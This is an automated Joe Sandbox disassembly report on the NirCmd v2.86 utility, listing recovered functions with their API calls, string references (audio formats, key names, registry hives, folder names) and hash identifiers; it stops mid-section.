TrueSpeech_8kHz1BitMono, xrefs: 00403F74
CCITT_ALaw_8kHzMono, xrefs: 00403F88
3, xrefs: 0040404A
44kHz8BitStereo, xrefs: 00403EE8
22kHz8BitStereo, xrefs: 00403DF8
CCITT_uLaw_8kHzMono, xrefs: 0040402C
4, xrefs: 0040405E
44kHz8BitMono, xrefs: 00403ED4
16kHz8BitStereo, xrefs: 00403DA8
24kHz8BitMono, xrefs: 00403E34
=, xrefs: 004040E5
48kHz8BitMono, xrefs: 00403F24
12kHz8BitStereo, xrefs: 00403D58
CCITT_ALaw_22kHzMono, xrefs: 00403FDC
22kHz16BitStereo, xrefs: 00403E20
16kHz8BitMono, xrefs: 00403D94
CCITT_uLaw_11kHzMono, xrefs: 00404054
1, xrefs: 00404022
48kHz16BitMono, xrefs: 00403F4C
@, xrefs: 0040410F
32kHz8BitStereo, xrefs: 00403E98
CCITT_ALaw_22kHzStereo, xrefs: 00403FF0
>, xrefs: 004040F3
CCITT_uLaw_22kHzStereo, xrefs: 0040408A
+, xrefs: 00403FA6
#, xrefs: 00403F06
8kHz16BitStereo, xrefs: 00403CE0
CCITT_ALaw_11kHzStereo, xrefs: 00403FC8
22kHz16BitMono, xrefs: 00403E0C
%, xrefs: 00403F2E
CCITT_uLaw_22kHzMono, xrefs: 0040407C
<, xrefs: 004040D7
$, xrefs: 00403F1A
11kHz16BitStereo, xrefs: 00403D30
CCITT_ALaw_11kHzMono, xrefs: 00403FB0
9, xrefs: 004040AD
CCITT_ALaw_44kHzMono, xrefs: 00404004
12kHz16BitMono, xrefs: 00403D6C

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpi
String ID: $!$"$#$$$%$&$'$($()A$)$*$+$,$-$.$/$0$1$11kHz16BitMono$11kHz16BitStereo$11kHz8BitMono$11kHz8BitStereo$12kHz16BitMono$12kHz16BitStereo$12kHz8BitMono$12kHz8BitStereo$16kHz16BitMono$16kHz16BitStereo$16kHz8BitMono$16kHz8BitStereo$2$22kHz16BitMono$22kHz16BitStereo$22kHz8BitMono$22kHz8BitStereo$24kHz16BitMono$24kHz16BitStereo$24kHz8BitMono$24kHz8BitStereo$3$32kHz16BitMono$32kHz16BitStereo$32kHz8BitMono$32kHz8BitStereo$4$44kHz16BitMono$44kHz16BitStereo$44kHz8BitMono$44kHz8BitStereo$48kHz16BitMono$48kHz16BitStereo$48kHz8BitMono$48kHz8BitStereo$5$6$7$8$8kHz16BitMono$8kHz16BitStereo$8kHz8BitMono$8kHz8BitStereo$9$:$;$<$=$>$?$@$A$ADPCM_11kHzMono$ADPCM_11kHzStereo$ADPCM_22kHzMono$ADPCM_22kHzStereo$ADPCM_44kHzMono$ADPCM_44kHzStereo$ADPCM_8kHzMono$ADPCM_8kHzStereo$B$C$CCITT_ALaw_11kHzMono$CCITT_ALaw_11kHzStereo$CCITT_ALaw_22kHzMono$CCITT_ALaw_22kHzStereo$CCITT_ALaw_44kHzMono$CCITT_ALaw_44kHzStereo$CCITT_ALaw_8kHzMono$CCITT_ALaw_8kHzStereo$CCITT_uLaw_11kHzMono$CCITT_uLaw_11kHzStereo$CCITT_uLaw_22kHzMono$CCITT_uLaw_22kHzStereo$CCITT_uLaw_44kHzMono$CCITT_uLaw_44kHzStereo$CCITT_uLaw_8kHzMono$CCITT_uLaw_8kHzStereo$D$GSM610_11kHzMono$GSM610_22kHzMono$GSM610_44kHzMono$GSM610_8kHzMono$TrueSpeech_8kHz1BitMono
API String ID: 1439213657-1730997795
Opcode ID: 9e1e4dfa34fd2f8dfec9beb8e39f38bb2e7052c6aced27dfa95cf0ab041b0218
Instruction ID: 616cf5521d8ee30aacb67ca84064b6405153b8803ee37ae220bff35b5abb023f
Opcode Fuzzy Hash: 9e1e4dfa34fd2f8dfec9beb8e39f38bb2e7052c6aced27dfa95cf0ab041b0218
Instruction Fuzzy Hash: C4B13EB080126DDBEB65CF41DA587CDBAB4BB05348F5091CAC158BB281C7FA0AD9DF58

Function 0040678B Relevance: 130.9, APIs: 44, Strings: 43, Instructions: 428
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00406791
_strcmpi.MSVCRT ref: 004067D4

Strings

delete, xrefs: 004069A8
rightctrl, xrefs: 0040684F
home, xrefs: 00406960
period, xrefs: 00406A11
subtract, xrefs: 00406AEC
rightshift, xrefs: 00406801
apps, xrefs: 00406A5C
left, xrefs: 00406930
comma, xrefs: 004069DB
pageup, xrefs: 00406A74
numlock, xrefs: 00406B8B
capslock, xrefs: 00406B76
cancel, xrefs: 00406B34
leftmenu, xrefs: 00406882
scroll, xrefs: 00406BA3
leftctrl, xrefs: 00406834
right, xrefs: 00406948
minus, xrefs: 004069F6
spc, xrefs: 004068E8
end, xrefs: 00406978
plus, xrefs: 004069C0
printscreen, xrefs: 00406BBB
rightmenu, xrefs: 0040689D
F, xrefs: 00406BDB
pagedown, xrefs: 00406A8C
ctrl, xrefs: 0040681C
f, xrefs: 00406BE0
alt, xrefs: 0040686A
down, xrefs: 00406900
backspace, xrefs: 00406B4C
shift, xrefs: 004067CE
leftshift, xrefs: 004067E6
esc, xrefs: 004068D0
divide, xrefs: 00406B1C
insert, xrefs: 00406990
enter, xrefs: 004068B8
multiply, xrefs: 00406ABC
add, xrefs: 00406AD4
pause, xrefs: 00406B61
rwin, xrefs: 00406A44
seperator, xrefs: 00406B04
lwin, xrefs: 00406A2C
tab, xrefs: 00406AA4

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpistrlen
String ID: F$add$alt$apps$backspace$cancel$capslock$comma$ctrl$delete$divide$down$end$enter$esc$f$home$insert$left$leftctrl$leftmenu$leftshift$lwin$minus$multiply$numlock$pagedown$pageup$pause$period$plus$printscreen$right$rightctrl$rightmenu$rightshift$rwin$scroll$seperator$shift$spc$subtract$tab
API String ID: 2953164535-3463197157
Opcode ID: 5f9163372c2cd67b4887e5440dff314ad2c71145c07568a1450bc9be0d234a63
Instruction ID: 6cf3061f4f1b4a3a8dc4e9dc4e2cf3cff59c93daa7677322c180900f4049563e
Opcode Fuzzy Hash: 5f9163372c2cd67b4887e5440dff314ad2c71145c07568a1450bc9be0d234a63
Instruction Fuzzy Hash: 19A13CB239D32968F91861212E12FEB1699CF51729F31103BF903F41C6FAEDA5B2505E

Function 00401000 Relevance: 57.9, APIs: 25, Strings: 8, Instructions: 179
windowfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ChildWindowFromPoint.USER32(?,?,?), ref: 00401047
GetDlgItem.USER32(?,000003EC), ref: 00401057
ShellExecuteA.SHELL32(?,open,http://www.nirsoft.net,00411F27,00411F27,00000005), ref: 0040107B
ChildWindowFromPoint.USER32(?,?,?), ref: 00401097
GetDlgItem.USER32(?,000003EC), ref: 004010A7
LoadCursorA.USER32(00000067), ref: 004010BD
SetCursor.USER32(00000000,?,?), ref: 004010C4
GetDlgItem.USER32(?,000003EC), ref: 004010D4
SetBkMode.GDI32(?,00000001), ref: 004010E8
SetTextColor.GDI32(?,00C00000), ref: 004010F6
GetSysColorBrush.USER32(0000000F), ref: 004010FE
EndDialog.USER32(?,00000001), ref: 00401124
DeleteObject.GDI32 ref: 00401130
MessageBoxA.USER32(00000000,?,NirCmd,00000024), ref: 00401177
memset.MSVCRT ref: 00401195
GetWindowsDirectoryA.KERNEL32(?,000000F0), ref: 004011A9
_mbscat.MSVCRT ref: 004011C2
CopyFileA.KERNEL32(?,?,00000000), ref: 004011E1
MessageBoxA.USER32(00000000,Failed to copy NirCmd !,Error,00000030), ref: 004011F8
SetWindowTextA.USER32(?,NirCmd), ref: 00401205
SetDlgItemTextA.USER32(?,000003EA,NirCmd v2.86Copyright (c) 2003 - 2019 Nir SoferFor more information about using this utility, read the help file - nircmd.chm), ref: 0040121C
SetDlgItemTextA.USER32(?,000003EC,http://www.nirsoft.net), ref: 0040122A
GetDlgItem.USER32(?,000003EC), ref: 0040122E
CreateFontIndirectA.GDI32(?), ref: 00401242
SendMessageA.USER32(00000000,00000030,00000000,00000000), ref: 00401253

Strings

If you copy NirCmd utility into your Windows directory, you'll be able to use NirCmd without specifying the full path of nircmd.exeDo you want to copy NirCmd into your Windows directory ?, xrefs: 00401162
nircmd.exe, xrefs: 004011BC
NirCmd, xrefs: 00401157, 004011FF
http://www.nirsoft.net, xrefs: 0040106E, 0040121E
Error, xrefs: 004011ED
Failed to copy NirCmd !, xrefs: 004011F2
NirCmd v2.86Copyright (c) 2003 - 2019 Nir SoferFor more information about using this utility, read the help file - nircmd.chm, xrefs: 00401211
open, xrefs: 00401073

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Item$Text$MessageWindow$ChildColorCursorFromPoint$BrushCopyCreateDeleteDialogDirectoryExecuteFileFontIndirectLoadModeObjectSendShellWindows_mbscatmemset
String ID: Error$Failed to copy NirCmd !$If you copy NirCmd utility into your Windows directory, you'll be able to use NirCmd without specifying the full path of nircmd.exeDo you want to copy NirCmd into your Windows directory ?$NirCmd$NirCmd v2.86Copyright (c) 2003 - 2019 Nir SoferFor more information about using this utility, read the help file - nircmd.chm$http://www.nirsoft.net$nircmd.exe$open
API String ID: 1344801783-3588370389
Opcode ID: aa90009937ac5df87c0ef0c6345ba922f25f1f4f4ca8a1b08f17dbaf6ca29328
Instruction ID: 95ce644df71112e4f5bf93e31658e12353af846712ee8fbfaa71453a5b9172e1
Opcode Fuzzy Hash: aa90009937ac5df87c0ef0c6345ba922f25f1f4f4ca8a1b08f17dbaf6ca29328
Instruction Fuzzy Hash: A1519C75A00209BBDB20AB60DC49FDF3A68EB08781F008576FB05F61F1D7B899819A5C

Function 0040E6E6 Relevance: 52.7, APIs: 18, Strings: 12, Instructions: 172
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040E71E
memcpy.MSVCRT ref: 0040E729
strlen.MSVCRT ref: 0040E736
strcmp.MSVCRT ref: 0040E74D
GetCurrentProcess.KERNEL32 ref: 0040E75A
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040E76F
GetProcAddress.KERNEL32(00000000), ref: 0040E776
strcmp.MSVCRT ref: 0040E79D
_strcmpi.MSVCRT ref: 0040E7BC
_strcmpi.MSVCRT ref: 0040E7D4
_strcmpi.MSVCRT ref: 0040E7EC
_strcmpi.MSVCRT ref: 0040E804
_strcmpi.MSVCRT ref: 0040E81C
_strcmpi.MSVCRT ref: 0040E830
_strcmpi.MSVCRT ref: 0040E844
_strcmpi.MSVCRT ref: 0040E858
_strcmpi.MSVCRT ref: 0040E86C
_strcmpi.MSVCRT ref: 0040E880

Strings

HKCU, xrefs: 0040E7FE
HKEY_CLASSES_ROOT, xrefs: 0040E816
HKEY_LOCAL_MACHINE, xrefs: 0040E7B6
HKEY_CURRENT_USER, xrefs: 0040E7E6
IsWow64Process, xrefs: 0040E760
HKU, xrefs: 0040E852
kernel32, xrefs: 0040E765
HKCR, xrefs: 0040E82A
HKLM, xrefs: 0040E7CE
HKEY_USERS, xrefs: 0040E83E
HKEY_CURRENT_CONFIG, xrefs: 0040E866
HKCC, xrefs: 0040E87A

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpi$strcmp$AddressCurrentHandleModuleProcProcessmemcpymemsetstrlen
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$IsWow64Process$kernel32
API String ID: 2692079152-2266215105
Opcode ID: e7f9481005193b3c4d9d90531baf4d568eaacbeddf083df3c70b55d6b8b21bf3
Instruction ID: a494c5e7f13fc44ae11766599c5c470138668bcdfce26567549bf84b3d492a57
Opcode Fuzzy Hash: e7f9481005193b3c4d9d90531baf4d568eaacbeddf083df3c70b55d6b8b21bf3
Instruction Fuzzy Hash: B8516472A483086EFB14EAE29941ADE7BAC9F44314F24482FFA10E71C1EA7CD595865C

Function 00404D14 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00404D36
memcpy.MSVCRT ref: 00404D64
_mbscpy.MSVCRT ref: 00404D7C
_strcmpi.MSVCRT ref: 00404D96
_strcmpi.MSVCRT ref: 00404DB9
_strcmpi.MSVCRT ref: 00404DDC

Strings

., xrefs: 00404EEA
F, xrefs: 00404EF9
del, xrefs: 00404ED9
ctrl, xrefs: 00404DB3
ins, xrefs: 00404EBC
alt, xrefs: 00404D90
ext, xrefs: 00404DF9
shift, xrefs: 00404DD6
esc, xrefs: 00404E9C
enter, xrefs: 00404E5C
spc, xrefs: 00404E3C
plus, xrefs: 00404E1C
tab, xrefs: 00404E7C

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpi$_mbscpymemcpymemset
String ID: .$F$alt$ctrl$del$enter$esc$ext$ins$plus$shift$spc$tab
API String ID: 2491115275-2319011969
Opcode ID: 2bd1bbcd66995d93a670adfe874cbc0423678e83b78ef91b29bc97a9acfa463d
Instruction ID: 668a005e2f39fca5e31490e88c77fe857c3ba33e66915e27bdd9f571ef9f2703
Opcode Fuzzy Hash: 2bd1bbcd66995d93a670adfe874cbc0423678e83b78ef91b29bc97a9acfa463d
Instruction Fuzzy Hash: D751B8B190C20999EF14EAA19945BDEB7BC9F50315F2004ABF641F20C1EBFC9BC59A1D

Function 00405FCF Relevance: 45.1, APIs: 15, Strings: 15, Instructions: 138COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 00405FD8
_strcmpi.MSVCRT ref: 00405FF0

Strings

programs, xrefs: 00406032
programfiles, xrefs: 004060E6
favorites, xrefs: 00406092
mydocuments, xrefs: 0040610C
common_programfiles, xrefs: 004060FB
cookies, xrefs: 0040607A
common_favorites, xrefs: 004060D1
startup, xrefs: 0040604A
start_menu, xrefs: 0040601A
common_programs, xrefs: 00405FEA
desktop, xrefs: 00406002
common_startup, xrefs: 004060BC
common_start_menu, xrefs: 00405FD0
recent, xrefs: 004060A7
appdata, xrefs: 00406062

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpi
String ID: appdata$common_favorites$common_programfiles$common_programs$common_start_menu$common_startup$cookies$desktop$favorites$mydocuments$programfiles$programs$recent$start_menu$startup
API String ID: 1439213657-4204506731
Opcode ID: 62900bb2b291047e5e744b34b4bb0bd742fee2e8bde05b1e9e46d9be80575ec0
Instruction ID: 84e747d3d89de970baa2b6eef6acbe2433b51fdacb2645c609412d554c0104a0
Opcode Fuzzy Hash: 62900bb2b291047e5e744b34b4bb0bd742fee2e8bde05b1e9e46d9be80575ec0
Instruction Fuzzy Hash: 8F31107138D71568F928A1622E17BDB42888F91719F31002BFB06F81CBFEDD95E2505E

Function 00401D7C Relevance: 40.3, APIs: 12, Strings: 11, Instructions: 97COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401DA5
wcsrchr.MSVCRT ref: 00401DAF
_wcsicmp.MSVCRT ref: 00401DC7
wcscpy.MSVCRT ref: 00401DDE
_wcsicmp.MSVCRT ref: 00401DEB
_wcsicmp.MSVCRT ref: 00401DFC
wcscpy.MSVCRT ref: 00401E13
_wcsicmp.MSVCRT ref: 00401E20
_wcsicmp.MSVCRT ref: 00401E31
wcscpy.MSVCRT ref: 00401E48
_wcsicmp.MSVCRT ref: 00401E55
wcscpy.MSVCRT ref: 00401E6C

Strings

image/bmp, xrefs: 00401E66
.bmp, xrefs: 00401E4F
.jpeg, xrefs: 00401DF6
.gif, xrefs: 00401DC1
image/tiff, xrefs: 00401E42
image/png, xrefs: 00401D97
image/gif, xrefs: 00401DD8
.tiff, xrefs: 00401E1A
.tif, xrefs: 00401E2B
image/jpeg, xrefs: 00401E0D
.jpg, xrefs: 00401DE5

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _wcsicmp$wcscpy$memsetwcsrchr
String ID: .bmp$.gif$.jpeg$.jpg$.tif$.tiff$image/bmp$image/gif$image/jpeg$image/png$image/tiff
API String ID: 4077561463-929284103
Opcode ID: e8fe433eef520ae3c433b2bc46bc108fbfc1c028796db5794f1d776e585c9bbb
Instruction ID: 18573b68ab7b8405bab2980dc367c91d58b0042c65243e02ac7ac69308cb81a4
Opcode Fuzzy Hash: e8fe433eef520ae3c433b2bc46bc108fbfc1c028796db5794f1d776e585c9bbb
Instruction Fuzzy Hash: F721517255831529FA24A561EE57FEF23A89F40724F2000AFF904E60D3EEFCAAD1459C

Function 00401BAA Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(GDIPlus.dll,?,00401C5D), ref: 00401BBB
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 00401BD7
GetProcAddress.KERNEL32(?,GdiplusShutdown), ref: 00401BE3
GetProcAddress.KERNEL32(?,GdipSaveImageToFile), ref: 00401BEF
GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 00401BFB
GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 00401C07
GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00401C13
GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 00401C1F
GetProcAddress.KERNEL32(?,GdipLoadImageFromFile), ref: 00401C2B
GetProcAddress.KERNEL32(?,GdipCreateHBITMAPFromBitmap), ref: 00401C37
GetProcAddress.KERNEL32(?,GdipCreateBitmapFromFile), ref: 00401C43

Strings

GdipGetImageEncoders, xrefs: 00401BFD
GdipCreateHBITMAPFromBitmap, xrefs: 00401C2D
GdiplusStartup, xrefs: 00401BD1
GdipLoadImageFromFile, xrefs: 00401C21
GdipCreateBitmapFromFile, xrefs: 00401C39
GdiplusShutdown, xrefs: 00401BD9
GdipSaveImageToFile, xrefs: 00401BE5
GdipGetImageEncodersSize, xrefs: 00401BF1
GDIPlus.dll, xrefs: 00401BB6
GdipCreateBitmapFromHBITMAP, xrefs: 00401C09
GdipDisposeImage, xrefs: 00401C15

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: GDIPlus.dll$GdipCreateBitmapFromFile$GdipCreateBitmapFromHBITMAP$GdipCreateHBITMAPFromBitmap$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipLoadImageFromFile$GdipSaveImageToFile$GdiplusShutdown$GdiplusStartup
API String ID: 2238633743-2224569043
Opcode ID: 61b926afc11940b05dd29d826a64e68c5647ae897ed916439a6a2eb5db193e78
Instruction ID: 0500e0c1d9706a3f21694b56e68380e9cd14f07ce3511409d06935751650487d
Opcode Fuzzy Hash: 61b926afc11940b05dd29d826a64e68c5647ae897ed916439a6a2eb5db193e78
Instruction Fuzzy Hash: 8311FE74A80744AACB31AF769D09D46BEF1EFE87003214D2EE2C5D3660D7BA9091DF48

Function 0040ED07 Relevance: 36.8, APIs: 11, Strings: 10, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 0040ED21
strlen.MSVCRT ref: 0040ED3F
??2@YAPAXI@Z.MSVCRT ref: 0040ED48
_memicmp.MSVCRT ref: 0040ED57
_memicmp.MSVCRT ref: 0040ED72
_mbscpy.MSVCRT ref: 0040EDD5
_mbscat.MSVCRT ref: 0040EDE5
??3@YAXPAX@Z.MSVCRT ref: 0040EDF8

Strings

HKCU, xrefs: 0040ED6C
HKEY_CLASSES_ROOT, xrefs: 0040ED99
HKEY_LOCAL_MACHINE, xrefs: 0040ED63
HKEY_CURRENT_USER, xrefs: 0040ED7E
HKU, xrefs: 0040EDBD
HKCR, xrefs: 0040ED87
HKLM, xrefs: 0040ED4F
HKEY_USERS, xrefs: 0040EDCF
HKEY_CURRENT_CONFIG, xrefs: 0040EDB4
HKCC, xrefs: 0040EDA2

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _memicmp$??2@??3@_mbscat_mbscpystrchrstrlen
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1094824001-909552448
Opcode ID: a8de2056a21eff082067b908bb00c76c7db1678acaa61244fb184de3d75fb3dd
Instruction ID: a462732c724014110786ec3a09ead7eae17c50b36558f99cba83444e58c4fc68
Opcode Fuzzy Hash: a8de2056a21eff082067b908bb00c76c7db1678acaa61244fb184de3d75fb3dd
Instruction Fuzzy Hash: 6C21B8B265830575E62136239D03FEB25888F55718F21083BFA05B11C3FABDD6E2519E

Function 0040D7FC Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,?,0040BFEF,?,?,Failed to load the process library !), ref: 0040D80F
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040D826
GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040D838
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040D84A
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040D85C
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040D86E
GetProcAddress.KERNEL32(NtQueryObject), ref: 0040D880
GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040D892
GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040D8A4

Strings

NtQuerySymbolicLinkObject, xrefs: 0040D85E
ntdll.dll, xrefs: 0040D80A
NtQueryObject, xrefs: 0040D870
NtUnloadDriver, xrefs: 0040D83A
NtResumeProcess, xrefs: 0040D894
NtLoadDriver, xrefs: 0040D828
NtQuerySystemInformation, xrefs: 0040D81B
NtSuspendProcess, xrefs: 0040D882
NtOpenSymbolicLinkObject, xrefs: 0040D84C

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
API String ID: 667068680-2887671607
Opcode ID: 88edd74978eebbde6a8b54eb6a302f0338cb48207eed49e69b5553b91389eee7
Instruction ID: 97e52fd98595b8367a39f4ffdcb843984cb43f9aa7f1a70d038ffbf428850fc4
Opcode Fuzzy Hash: 88edd74978eebbde6a8b54eb6a302f0338cb48207eed49e69b5553b91389eee7
Instruction Fuzzy Hash: B4013274E42364AACB11EFB1BC49ACA3E71E704765B23853BE40462270D679D5D4DE4C

Function 00404512 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 140libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00404539
memset.MSVCRT ref: 0040454E
memset.MSVCRT ref: 00404563
memset.MSVCRT ref: 0040457D
memset.MSVCRT ref: 00404596
memset.MSVCRT ref: 004045AB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004045DE
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004045FD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040461C
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000FFF), ref: 0040463F
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0040464F
GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 00404661
GetLastError.KERNEL32 ref: 00404689
FreeLibrary.KERNEL32(00000000), ref: 00404699
GetLastError.KERNEL32 ref: 004046A1

Strings

advapi32.dll, xrefs: 0040464A
CreateProcessWithLogonW, xrefs: 0040465B

Memory Dump Source

